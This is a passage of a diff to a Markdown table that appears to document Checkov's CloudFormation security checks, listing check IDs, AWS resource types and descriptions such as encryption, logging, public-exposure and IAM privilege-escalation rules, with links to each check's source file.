AWS::ECR::Repository | Ensure ECR image scanning on push is enabled | Cloudformation | [ECRImageScanning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRImageScanning.py) | -| 142 | CKV_AWS_164 | resource | AWS::Transfer::Server | Ensure Transfer Server is not exposed publicly. | Cloudformation | [TransferServerIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/TransferServerIsPublic.py) | -| 143 | CKV_AWS_165 | resource | AWS::DynamoDB::GlobalTable | Ensure DynamoDB global table point in time recovery (backup) is enabled | Cloudformation | [DynamodbGlobalTableRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamodbGlobalTableRecovery.py) | -| 144 | CKV_AWS_166 | resource | AWS::Backup::BackupVault | Ensure Backup Vault is encrypted at rest using KMS CMK | Cloudformation | [BackupVaultEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/BackupVaultEncrypted.py) | -| 145 | CKV_AWS_170 | resource | AWS::QLDB::Ledger | Ensure QLDB ledger permissions mode is set to STANDARD | Cloudformation | [QLDBLedgerPermissionsMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/QLDBLedgerPermissionsMode.py) | -| 146 | CKV_AWS_172 | resource | AWS::QLDB::Ledger | Ensure QLDB ledger has deletion protection enabled | Cloudformation | [QLDBLedgerDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/QLDBLedgerDeletionProtection.py) | -| 147 | CKV_AWS_173 | resource | AWS::Lambda::Function | Check encryption settings for Lambda environment variable | Cloudformation | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) | -| 148 | CKV_AWS_173 | 
resource | AWS::Serverless::Function | Check encryption settings for Lambda environment variable | Cloudformation | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) | -| 149 | CKV_AWS_174 | resource | AWS::CloudFront::Distribution | Verify CloudFront Distribution Viewer Certificate is using TLS v1.2 | Cloudformation | [CloudFrontTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudFrontTLS12.py) | -| 150 | CKV_AWS_192 | resource | AWS::WAFv2::WebACL | Ensure WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Cloudformation | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WAFACLCVE202144228.py) | -| 151 | CKV_AWS_193 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync has Logging enabled | Cloudformation | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncLogging.py) | -| 152 | CKV_AWS_194 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync has Field-Level logs enabled | Cloudformation | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncFieldLevelLogs.py) | -| 153 | CKV_AWS_195 | resource | AWS::Glue::Crawler | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 154 | CKV_AWS_195 | resource | AWS::Glue::DevEndpoint | Ensure Glue component has a security configuration associated | Cloudformation | 
[GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 155 | CKV_AWS_195 | resource | AWS::Glue::Job | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 156 | CKV_AWS_197 | resource | AWS::AmazonMQ::Broker | Ensure MQ Broker Audit logging is enabled | Cloudformation | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MQBrokerAuditLogging.py) | -| 157 | CKV_AWS_258 | resource | AWS::Lambda::Url | Ensure that Lambda function URLs AuthType is not None | Cloudformation | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionURLAuth.py) | -| 158 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroup | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | -| 159 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroupIngress | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | -| 160 | CKV_AWS_317 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch Domain Audit Logging is enabled | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | -| 161 | CKV_AWS_317 | resource | 
AWS::OpenSearchService::Domain | Ensure Elasticsearch Domain Audit Logging is enabled | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | -| 162 | CKV_AWS_360 | resource | AWS::DocDB::DBCluster | Ensure DocumentDB has an adequate backup retention period | Cloudformation | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBBackupRetention.py) | -| 163 | CKV_AWS_361 | resource | AWS::Neptune::DBCluster | Ensure that Neptune DB cluster has automated backups enabled with adequate retention | Cloudformation | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterBackupRetention.py) | -| 164 | CKV_AWS_363 | resource | AWS::Lambda::Function | Ensure Lambda Runtime is not deprecated | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py) | -| 165 | CKV_AWS_363 | resource | AWS::Serverless::Function | Ensure Lambda Runtime is not deprecated | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py) | -| 166 | CKV_AWS_364 | resource | AWS::Lambda::Permission | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount | Cloudformation | [LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaServicePermission.py) | -| 167 | CKV2_AWS_33 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync is protected by WAF | Cloudformation | 
[AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/AppSyncProtectedByWAF.yaml) | +| 70 | CKV_AWS_80 | resource | AWS::MSK::Cluster | Ensure MSK Cluster logging is enabled | Cloudformation | [MSKClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterLogging.py) | +| 71 | CKV_AWS_81 | resource | AWS::MSK::Cluster | Ensure MSK Cluster encryption in rest and transit is enabled | Cloudformation | [MSKClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterEncryption.py) | +| 72 | CKV_AWS_82 | resource | AWS::Athena::WorkGroup | Ensure Athena Workgroup should enforce configuration to prevent client disabling encryption | Cloudformation | [AthenaWorkgroupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AthenaWorkgroupConfiguration.py) | +| 73 | CKV_AWS_83 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch Domain enforces HTTPS | Cloudformation | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py) | +| 74 | CKV_AWS_84 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch Domain Logging is enabled | Cloudformation | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainLogging.py) | +| 75 | CKV_AWS_84 | resource | AWS::OpenSearchService::Domain | Ensure Elasticsearch Domain Logging is enabled | Cloudformation | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainLogging.py) | +| 76 | CKV_AWS_85 | resource | AWS::DocDB::DBCluster | Ensure DocumentDB Logging is enabled | Cloudformation | 
[DocDBLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBLogging.py) | +| 77 | CKV_AWS_86 | resource | AWS::CloudFront::Distribution | Ensure CloudFront Distribution has Access Logging enabled | Cloudformation | [CloudfrontDistributionLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudfrontDistributionLogging.py) | +| 78 | CKV_AWS_87 | resource | AWS::Redshift::Cluster | Redshift cluster should not be publicly accessible | Cloudformation | [RedshiftClusterPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftClusterPubliclyAccessible.py) | +| 79 | CKV_AWS_88 | resource | AWS::EC2::Instance | EC2 instance should not have public IP. | Cloudformation | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2PublicIP.py) | +| 80 | CKV_AWS_88 | resource | AWS::EC2::LaunchTemplate | EC2 instance should not have public IP. 
| Cloudformation | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2PublicIP.py) | +| 81 | CKV_AWS_89 | resource | AWS::DMS::ReplicationInstance | DMS replication instance should not be publicly accessible | Cloudformation | [DMSReplicationInstancePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DMSReplicationInstancePubliclyAccessible.py) | +| 82 | CKV_AWS_90 | resource | AWS::DocDB::DBClusterParameterGroup | Ensure DocumentDB TLS is not disabled | Cloudformation | [DocDBTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBTLS.py) | +| 83 | CKV_AWS_91 | resource | AWS::ElasticLoadBalancingV2::LoadBalancer | Ensure the ELBv2 (Application/Network) has access logging enabled | Cloudformation | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ELBv2AccessLogs.py) | +| 84 | CKV_AWS_92 | resource | AWS::ElasticLoadBalancing::LoadBalancer | Ensure the ELB has access logging enabled | Cloudformation | [ELBAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ELBAccessLogs.py) | +| 85 | CKV_AWS_94 | resource | AWS::Glue::DataCatalogEncryptionSettings | Ensure Glue Data Catalog Encryption is enabled | Cloudformation | [GlueDataCatalogEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueDataCatalogEncryption.py) | +| 86 | CKV_AWS_95 | resource | AWS::ApiGatewayV2::Stage | Ensure API Gateway V2 has Access Logging enabled | Cloudformation | [APIGatewayV2AccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayV2AccessLogging.py) | +| 87 | CKV_AWS_95 | resource | AWS::Serverless::HttpApi | Ensure API Gateway V2 has Access Logging enabled | Cloudformation | 
[APIGatewayV2AccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayV2AccessLogging.py) | +| 88 | CKV_AWS_96 | resource | AWS::RDS::DBCluster | Ensure all data stored in Aurora is securely encrypted at rest | Cloudformation | [AuroraEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AuroraEncryption.py) | +| 89 | CKV_AWS_97 | resource | AWS::ECS::TaskDefinition | Ensure Encryption in transit is enabled for EFS volumes in ECS Task definitions | Cloudformation | [ECSTaskDefinitionEFSVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECSTaskDefinitionEFSVolumeEncryption.py) | +| 90 | CKV_AWS_99 | resource | AWS::Glue::SecurityConfiguration | Ensure Glue Security Configuration Encryption is enabled | Cloudformation | [GlueSecurityConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfiguration.py) | +| 91 | CKV_AWS_100 | resource | AWS::EKS::Nodegroup | Ensure AWS EKS node group does not have implicit SSH access from 0.0.0.0/0 | Cloudformation | [EKSNodeGroupRemoteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EKSNodeGroupRemoteAccess.py) | +| 92 | CKV_AWS_101 | resource | AWS::Neptune::DBCluster | Ensure Neptune logging is enabled | Cloudformation | [NeptuneClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterLogging.py) | +| 93 | CKV_AWS_103 | resource | AWS::ElasticLoadBalancingV2::Listener | Ensure that Load Balancer Listener is using at least TLS v1.2 | Cloudformation | [ALBListenerTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBListenerTLS12.py) | +| 94 | CKV_AWS_104 | resource | AWS::DocDB::DBClusterParameterGroup | Ensure 
DocumentDB has audit logs enabled | Cloudformation | [DocDBAuditLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBAuditLogs.py) | +| 95 | CKV_AWS_105 | resource | AWS::Redshift::ClusterParameterGroup | Ensure Redshift uses SSL | Cloudformation | [RedShiftSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedShiftSSL.py) | +| 96 | CKV_AWS_107 | resource | AWS::IAM::Group | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | +| 97 | CKV_AWS_107 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | +| 98 | CKV_AWS_107 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | +| 99 | CKV_AWS_107 | resource | AWS::IAM::Role | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | +| 100 | CKV_AWS_107 | resource | AWS::IAM::User | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | +| 101 | CKV_AWS_108 | resource | AWS::IAM::Group | Ensure IAM policies does not allow data exfiltration | Cloudformation | 
[IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | +| 102 | CKV_AWS_108 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | +| 103 | CKV_AWS_108 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | +| 104 | CKV_AWS_108 | resource | AWS::IAM::Role | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | +| 105 | CKV_AWS_108 | resource | AWS::IAM::User | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | +| 106 | CKV_AWS_109 | resource | AWS::IAM::Group | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | +| 107 | CKV_AWS_109 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | +| 108 | CKV_AWS_109 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | 
[IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | +| 109 | CKV_AWS_109 | resource | AWS::IAM::Role | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | +| 110 | CKV_AWS_109 | resource | AWS::IAM::User | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | +| 111 | CKV_AWS_110 | resource | AWS::IAM::Group | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 112 | CKV_AWS_110 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 113 | CKV_AWS_110 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 114 | CKV_AWS_110 | resource | AWS::IAM::Role | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 115 | CKV_AWS_110 | resource | AWS::IAM::User | Ensure IAM policies does not allow privilege escalation | Cloudformation | 
[IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 116 | CKV_AWS_111 | resource | AWS::IAM::Group | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) | +| 117 | CKV_AWS_111 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) | +| 118 | CKV_AWS_111 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) | +| 119 | CKV_AWS_111 | resource | AWS::IAM::Role | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) | +| 120 | CKV_AWS_111 | resource | AWS::IAM::User | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) | +| 121 | CKV_AWS_115 | resource | AWS::Lambda::Function | Ensure that AWS Lambda function is configured for function-level concurrent execution limit | Cloudformation | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py) | +| 122 | CKV_AWS_115 | resource | AWS::Serverless::Function | Ensure that AWS Lambda function is configured for 
function-level concurrent execution limit | Cloudformation | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py) | +| 123 | CKV_AWS_116 | resource | AWS::Lambda::Function | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ) | Cloudformation | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaDLQConfigured.py) | +| 124 | CKV_AWS_116 | resource | AWS::Serverless::Function | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ) | Cloudformation | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaDLQConfigured.py) | +| 125 | CKV_AWS_117 | resource | AWS::Lambda::Function | Ensure that AWS Lambda function is configured inside a VPC | Cloudformation | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaInVPC.py) | +| 126 | CKV_AWS_117 | resource | AWS::Serverless::Function | Ensure that AWS Lambda function is configured inside a VPC | Cloudformation | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaInVPC.py) | +| 127 | CKV_AWS_118 | resource | AWS::RDS::DBInstance | Ensure that enhanced monitoring is enabled for Amazon RDS instances | Cloudformation | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSEnhancedMonitorEnabled.py) | +| 128 | CKV_AWS_119 | resource | AWS::DynamoDB::Table | Ensure DynamoDB Tables are encrypted using a KMS Customer Managed CMK | Cloudformation | [DynamoDBTablesEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamoDBTablesEncrypted.py) | +| 129 | CKV_AWS_120 
| resource | AWS::ApiGateway::Stage | Ensure API Gateway caching is enabled | Cloudformation | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayCacheEnable.py) | +| 130 | CKV_AWS_120 | resource | AWS::Serverless::Api | Ensure API Gateway caching is enabled | Cloudformation | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayCacheEnable.py) | +| 131 | CKV_AWS_123 | resource | AWS::EC2::VPCEndpointService | Ensure that VPC Endpoint Service is configured for Manual Acceptance | Cloudformation | [VPCEndpointAcceptanceConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/VPCEndpointAcceptanceConfigured.py) | +| 132 | CKV_AWS_131 | resource | AWS::ElasticLoadBalancingV2::LoadBalancer | Ensure that ALB drops HTTP headers | Cloudformation | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBDropHttpHeaders.py) | +| 133 | CKV_AWS_136 | resource | AWS::ECR::Repository | Ensure that ECR repositories are encrypted using KMS | Cloudformation | [ECRRepositoryEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRRepositoryEncrypted.py) | +| 134 | CKV_AWS_149 | resource | AWS::SecretsManager::Secret | Ensure that Secrets Manager secret is encrypted using KMS CMK | Cloudformation | [SecretManagerSecretEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecretManagerSecretEncrypted.py) | +| 135 | CKV_AWS_154 | resource | AWS::Redshift::Cluster | Ensure Redshift is not deployed outside of a VPC | Cloudformation | [RedshiftInEc2ClassicMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftInEc2ClassicMode.py) | +| 136 | CKV_AWS_155 | resource 
| AWS::WorkSpaces::Workspace | Ensure that Workspace user volumes are encrypted | Cloudformation | [WorkspaceUserVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WorkspaceUserVolumeEncrypted.py) | +| 137 | CKV_AWS_156 | resource | AWS::WorkSpaces::Workspace | Ensure that Workspace root volumes are encrypted | Cloudformation | [WorkspaceRootVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WorkspaceRootVolumeEncrypted.py) | +| 138 | CKV_AWS_157 | resource | AWS::RDS::DBInstance | Ensure that RDS instances have Multi-AZ enabled | Cloudformation | [RDSMultiAZEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSMultiAZEnabled.py) | +| 139 | CKV_AWS_158 | resource | AWS::Logs::LogGroup | Ensure that CloudWatch Log Group is encrypted by KMS | Cloudformation | [CloudWatchLogGroupKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudWatchLogGroupKMSKey.py) | +| 140 | CKV_AWS_160 | resource | AWS::Timestream::Database | Ensure that Timestream database is encrypted with KMS CMK | Cloudformation | [TimestreamDatabaseKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/TimestreamDatabaseKMSKey.py) | +| 141 | CKV_AWS_161 | resource | AWS::RDS::DBInstance | Ensure RDS database has IAM authentication enabled | Cloudformation | [RDSIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSIAMAuthentication.py) | +| 142 | CKV_AWS_162 | resource | AWS::RDS::DBCluster | Ensure RDS cluster has IAM authentication enabled | Cloudformation | [RDSClusterIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSClusterIAMAuthentication.py) | +| 143 | CKV_AWS_163 | resource | 
AWS::ECR::Repository | Ensure ECR image scanning on push is enabled | Cloudformation | [ECRImageScanning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRImageScanning.py) | +| 144 | CKV_AWS_164 | resource | AWS::Transfer::Server | Ensure Transfer Server is not exposed publicly. | Cloudformation | [TransferServerIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/TransferServerIsPublic.py) | +| 145 | CKV_AWS_165 | resource | AWS::DynamoDB::GlobalTable | Ensure DynamoDB global table point in time recovery (backup) is enabled | Cloudformation | [DynamodbGlobalTableRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamodbGlobalTableRecovery.py) | +| 146 | CKV_AWS_166 | resource | AWS::Backup::BackupVault | Ensure Backup Vault is encrypted at rest using KMS CMK | Cloudformation | [BackupVaultEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/BackupVaultEncrypted.py) | +| 147 | CKV_AWS_170 | resource | AWS::QLDB::Ledger | Ensure QLDB ledger permissions mode is set to STANDARD | Cloudformation | [QLDBLedgerPermissionsMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/QLDBLedgerPermissionsMode.py) | +| 148 | CKV_AWS_172 | resource | AWS::QLDB::Ledger | Ensure QLDB ledger has deletion protection enabled | Cloudformation | [QLDBLedgerDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/QLDBLedgerDeletionProtection.py) | +| 149 | CKV_AWS_173 | resource | AWS::Lambda::Function | Check encryption settings for Lambda environment variable | Cloudformation | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) | +| 150 | CKV_AWS_173 | 
